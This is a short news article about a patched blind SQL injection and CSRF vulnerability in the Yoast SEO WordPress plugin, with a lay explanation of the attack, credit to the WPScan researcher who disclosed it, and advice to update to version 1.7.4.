A critical security vulnerability has been identified on one of the most popular and widely used SEO plugins for the WordPress content management system (CMS). Yoast SEO suffers from an exploit which allows hackers to modify the server’s database using a method called blind SQL injection. And failure to fix this vulnerability could have disastrous consequences.
Yoast SEO features a wide range of tools designed to help webmasters and bloggers optimize their sites, including an XML sitemap generator, RSS enhancements, on-page content analysis, custom titles and meta tags, breadcrumbs, canonical links, permalinks, social media integration, and more. Best of all, the plugin is free to use (paid/premium versions are also available).
To put the popularity of Yoast SEO into perspective, the official website claims that more than 14 million users have downloaded and installed the all-in-one search engine optimization plugin. That’s far more than any other SEO plugin available for WordPress. However, popularity isn’t necessarily an indication of security, such as the case with this recent vulnerability.
So, what exactly is a blind SQL injection and how to you fix it? A blind SQL injection is basically a malicious cyber attack in which a hacker spams the database with true and false questions to either extract or insert code. Technical jargon aside, it can be used for a wide range of malicious purposes, such as setting up redirects, installing malware, placing pop-up ads on the site, or completely erasing the site’s data.
Tyan Dewhurst from WPScan was reportedly the first person to spot the vulnerability within Yoast SEO, announcing the discovery on his blog. It wasn’t long before the plugin was patched to fix the vulnerability.
The good news is that you protect your site from this vulnerability by updating Yoast SEO to the latest version (version 1.7.4). The update notes for this version state the following:
“Security fix: fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor. Thanks Ryan Dewhurst from WPScan for discovering and responsibly disclosing this issue.”
The bottom line is that every webmaster and blogger using Yoast should check to make sure they are running 1.7.4 or newer.
Do you currently use Yoast SEO plugin? Let us know in the comments section below!